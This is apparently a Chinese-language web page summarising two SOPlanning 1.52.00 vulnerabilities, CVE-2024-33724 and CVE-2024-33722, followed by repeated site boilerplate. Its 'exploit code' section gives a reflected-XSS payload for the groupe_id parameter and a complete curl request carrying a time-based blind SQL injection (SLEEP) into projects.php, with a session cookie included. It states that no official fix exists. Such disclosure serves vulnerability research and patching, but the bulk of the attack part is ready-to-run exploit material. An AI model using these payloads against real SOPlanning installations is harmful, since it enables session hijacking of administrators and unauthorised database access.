SOPlanning 1.52.00 XSS与SQL注入漏洞(CVE-2024-33724/33722)及利用代码

# SOPlanning 1.52.00 漏洞总结 ## 漏洞概述 SOPlanning 1.52.00 存在两个严重安全漏洞： 1. **反射型跨站脚本 (XSS)** - 通过 `groupe_save.php` 的 `groupe_id` 参数触发 2. **SQL 注入 (SQLi)** - 通过 `projects.php` 的多个参数触发 ## 影响范围 - **应用版本**: SOPlanning 1.52.00 - **测试环境**: Linux - **漏洞编号**: CVE-2024-33724 (XSS), CVE-2024-33722 (SQLi) - **攻击类型**: - XSS: 远程未认证攻击者可劫持管理员账户或用户会话 - SQLi: 需要认证凭据，可获取数据库信息 ## 修复方案 - 暂无官方修复方案发布 - 建议升级至安全版本或应用临时缓解措施 ## 利用代码 ### XSS 利用代码 ```html ">alert('LIQUIDSKY')<!- ``` ### SQL 注入利用代码 ```bash curl -i -s -k -X $'POST' \ -H $'Host: 127.0.0.1' \ -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' \ -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \ -H $'Accept-Language: en-US,en;q=0.5' \ -H $'Accept-Encoding: gzip, deflate, br' \ -H $'Content-Type: application/x-www-form-urlencoded' \ -H $'Content-Length: 130' \ -H $'Origin: http://127.0.0.1' \ -H $'Connection: close' \ -H $'Referer: http://127.0.0.1/soPlanning/www/projects.php' \ -H $'Upgrade-Insecure-Requests: 1' \ -H $'Sec-Fetch-Dest: document' \ -H $'Sec-Fetch-Mode: navigate' \ -H $'Sec-Fetch-Site: same-origin' \ -H $'Sec-Fetch-User: ?1' \ -b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=oyvpcbvbcb8Uh7anfbq2lu96bi; soPlanningplanning=_nhtdt0rgs562vm8nft5641481; baseLigne=users; baseColonne=jours; afficherTableau=Recap1; masquerLigneVider=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%2C%225D' \ --data-binary $'filtreGroupeProjet=&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10))PuxA)+AND+Liquidsky='Liquidsky&rechercheProjet=test' \ $'http://127.0.0.1/soPlanning/www/projects.php' ``` **注意**: SQL 注入需要认证凭据，请求必须是有效的 SQLi 请求。此 curl 请求可用于使用代理重建有效请求。

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

SOPlanning 1.52.00 XSS与SQL注入漏洞(CVE-2024-33724/33722)及利用代码

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

SOPlanning 1.52.00 XSS与SQL注入漏洞(CVE-2024-33724/33722)及利用代码

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！